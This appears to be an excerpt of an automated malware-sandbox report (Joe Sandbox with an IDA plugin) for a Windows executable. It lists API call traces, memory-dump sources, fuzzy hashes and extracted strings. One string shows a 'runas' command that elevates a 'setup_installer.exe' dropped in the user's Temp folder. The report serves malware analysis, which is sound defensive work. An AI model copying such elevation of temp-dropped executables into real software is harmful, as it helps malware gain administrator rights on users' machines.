                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                          • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                        • ShowWindow.USER32(?,00000005), ref: 00405162
                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405263
                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C5
                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DA
                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FE
                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405321
                                        • ImageList_Destroy.COMCTL32(?), ref: 00405336
                                        • GlobalFree.KERNEL32(?), ref: 00405346
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053BF
                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405468
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405477
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A1
                                        • ShowWindow.USER32(?,00000000), ref: 004054EF
                                        • GetDlgItem.USER32(?,000003FE), ref: 004054FA
                                        • ShowWindow.USER32(00000000), ref: 00405501
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 2564846305-813528018
                                        • Opcode ID: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
                                        • Instruction ID: 51cb895bf96748e94aa34dbd086816f234b0803d1cad36f3447be88a3ed44bf2
                                        • Opcode Fuzzy Hash: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
                                        • Instruction Fuzzy Hash: 0C126970900609EFDF209FA5DC45AAE7BB5FB44314F10817AEA10BA2E1D7798A52CF58
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF5
                                        • ShowWindow.USER32(?), ref: 00404012
                                        • DestroyWindow.USER32 ref: 00404026
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404042
                                        • GetDlgItem.USER32(?,?), ref: 00404063
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404077
                                        • IsWindowEnabled.USER32(00000000), ref: 0040407E
                                        • GetDlgItem.USER32(?,00000001), ref: 0040412C
                                        • GetDlgItem.USER32(?,00000002), ref: 00404136
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00404150
                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A1
                                        • GetDlgItem.USER32(?,00000003), ref: 00404247
                                        • ShowWindow.USER32(00000000,?), ref: 00404268
                                        • EnableWindow.USER32(?,?), ref: 0040427A
                                        • EnableWindow.USER32(?,?), ref: 00404295
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042AB
                                        • EnableMenuItem.USER32(00000000), ref: 004042B2
                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042CA
                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042DD
                                        • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404307
                                        • SetWindowTextW.USER32(?,00423748), ref: 0040431B
                                        • ShowWindow.USER32(?,0000000A), ref: 0040444F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                        • String ID: H7B
                                        • API String ID: 184305955-2300413410
                                        • Opcode ID: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
                                        • Instruction ID: 474293f91904d384e756f83d9200f154ec1a476d51ccc5c10f5d023ba508d08e
                                        • Opcode Fuzzy Hash: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
                                        • Instruction Fuzzy Hash: 17C1B1B1600604FBCB216F61EE85E2A7BB8EB84705F40497EF741B51F1CB3958529B2E
                                        APIs
                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046EF
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404703
                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404720
                                        • GetSysColor.USER32(?), ref: 00404731
                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040473F
                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040474D
                                        • lstrlenW.KERNEL32(?), ref: 00404752
                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040475F
                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404774
                                        • GetDlgItem.USER32(?,0000040A), ref: 004047CD
                                        • SendMessageW.USER32(00000000), ref: 004047D4
                                        • GetDlgItem.USER32(?,000003E8), ref: 004047FF
                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404842
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404850
                                        • SetCursor.USER32(00000000), ref: 00404853
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040486C
                                        • SetCursor.USER32(00000000), ref: 0040486F
                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040489E
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B0
                                        Strings
                                        • N, xrefs: 004047ED
                                        • runas C:\Users\user\AppData\Local\Temp\setup_installer.exe, xrefs: 0040482E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: N$runas C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                        • API String ID: 3103080414-3434175074
                                        • Opcode ID: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
                                        • Instruction ID: 9740ae806e86bdd9a5d1823962a5ed5927fd13c96e858ba55e5d087808badbab
                                        • Opcode Fuzzy Hash: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
                                        • Instruction Fuzzy Hash: EE6193B1900209FFDB10AF60DD85E6A7B69FB84314F00853AFA05B62D1D7789D51CF98
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406323,?,?), ref: 004061C3
                                        • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004061CC
                                          • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                                          • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                                        • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 004061E9
                                        • wsprintfA.USER32 ref: 00406207
                                        • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406242
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406251
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406289
                                        • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 004062DF
                                        • GlobalFree.KERNEL32(00000000), ref: 004062F0
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F7
                                          • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,80000000,00000003), ref: 00406036
                                          • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                        • API String ID: 2171350718-2295842750
                                        • Opcode ID: 1370db5916d635a3eaa8287a3a8568cfa6b7ad2c16bbfcffe5a040e030d3314f
                                        • Instruction ID: 390cd084817c4cf50855a9647c10840f2cfe6cacc919d204b2e4a530669b52c0
                                        • Opcode Fuzzy Hash: 1370db5916d635a3eaa8287a3a8568cfa6b7ad2c16bbfcffe5a040e030d3314f
                                        • Instruction Fuzzy Hash: FB312231200715BBC2207B659E49F5B3A9CEF41754F16007FBA42F62C2EA3CD82586BD
                                        APIs
                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
                                        • Instruction ID: 0f43a076eda42f240989ba3bcaaa7122e90b548761b3bfdbbaf4c3cca9648f62
                                        • Opcode Fuzzy Hash: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
                                        • Instruction Fuzzy Hash: CF418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7389A55DFA4
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00000400), ref: 004066BA
                                        • GetWindowsDirectoryW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00000400,00000000,00422728,?,004055DB,00422728,00000000), ref: 004066CD
                                        • SHGetSpecialFolderLocation.SHELL32(004055DB,00000000,00000000,00422728,?,004055DB,00422728,00000000), ref: 00406709
                                        • SHGetPathFromIDListW.SHELL32(00000000,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe), ref: 00406717
                                        • CoTaskMemFree.OLE32(00000000), ref: 00406722
                                        • lstrcatW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 00406748
                                        • lstrlenW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00000000,00422728,?,004055DB,00422728,00000000), ref: 004067A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                        • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$runas C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                        • API String ID: 717251189-994760500
                                        • Opcode ID: 461394275e41b2543b5fd82fcf6b9832f1e7dc77c54885fbf13ec40e6163d1f3
                                        • Instruction ID: 6f5f2b99d90c7511299ba9a64344c15edde84ad84532d0df03b232db96096e81
                                        • Opcode Fuzzy Hash: 461394275e41b2543b5fd82fcf6b9832f1e7dc77c54885fbf13ec40e6163d1f3
                                        • Instruction Fuzzy Hash: BA613671601111ABDF209F14DD80AAE37A5AF10718F52403FE943B72D0DB3E5AA6CB5D
                                        APIs
                                        • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                        • lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                        • lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                                        • SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: ('B
                                        • API String ID: 2531174081-2332581011
                                        • Opcode ID: 8d4ec48a8783ac7c02cf808f938a66a70b9f0af433ef19620f9c759a8ff7b601
                                        • Instruction ID: cea8892cb4e31635aa5f40387e4ea582d2b984c796fabda61e5f1d3d18a4122e
                                        • Opcode Fuzzy Hash: 8d4ec48a8783ac7c02cf808f938a66a70b9f0af433ef19620f9c759a8ff7b601
                                        • Instruction Fuzzy Hash: E6218E71900518BACB119F65DD44ECFBFB9EF45360F54443AF904B62A0C77A4A508FA8
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                                        • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                                        • CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                                        • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004067EC
                                        • "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe", xrefs: 004067EB
                                        • *?|<>/":, xrefs: 0040683D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-869326622
                                        • Opcode ID: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
                                        • Instruction ID: fdbe35b52bffc5d77a346742aeba0a27372f18d7f8de2c65e324d6b3b11dfc69
                                        • Opcode Fuzzy Hash: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
                                        • Instruction Fuzzy Hash: 8211932780261255DB303B559C44AB762E8AF94790B56C83FED8A732C0EB7C4C9286BD
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 00404516
                                        • GetSysColor.USER32(00000000), ref: 00404554
                                        • SetTextColor.GDI32(?,00000000), ref: 00404560
                                        • SetBkMode.GDI32(?,?), ref: 0040456C
                                        • GetSysColor.USER32(?), ref: 0040457F
                                        • SetBkColor.GDI32(?,?), ref: 0040458F
                                        • DeleteObject.GDI32(?), ref: 004045A9
                                        • CreateBrushIndirect.GDI32(?), ref: 004045B3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                        • Instruction ID: b56a63bd10d9b88d704488fa4fc448251793e5de010e462820c933ca6d0d38e3
                                        • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                        • Instruction Fuzzy Hash: F52167B1500B04AFCB31DF68DD48A577BF8AF41714B048A2EEA96A26E1D734D904CF58
                                        APIs
                                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                          • Part of subcall function 00406113: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406129
                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                        • String ID: 9
                                        • API String ID: 163830602-2366072709
                                        • Opcode ID: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
                                        • Instruction ID: 9e8848406421114bacb3fc7d7daa07285f06221c2759d1c737873bd090f70c65
                                        • Opcode Fuzzy Hash: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
                                        • Instruction Fuzzy Hash: 5951F975D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402FE1
                                        • GetTickCount.KERNEL32 ref: 00402FFF
                                        • wsprintfW.USER32 ref: 0040302D
                                          • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                          • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                          • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                                          • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                                          • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                          • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                          • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00403051
                                        • ShowWindow.USER32(00000000,00000005), ref: 0040305F
                                          • Part of subcall function 00402FAA: MulDiv.KERNEL32(00000000,00000064,003564E3), ref: 00402FBF
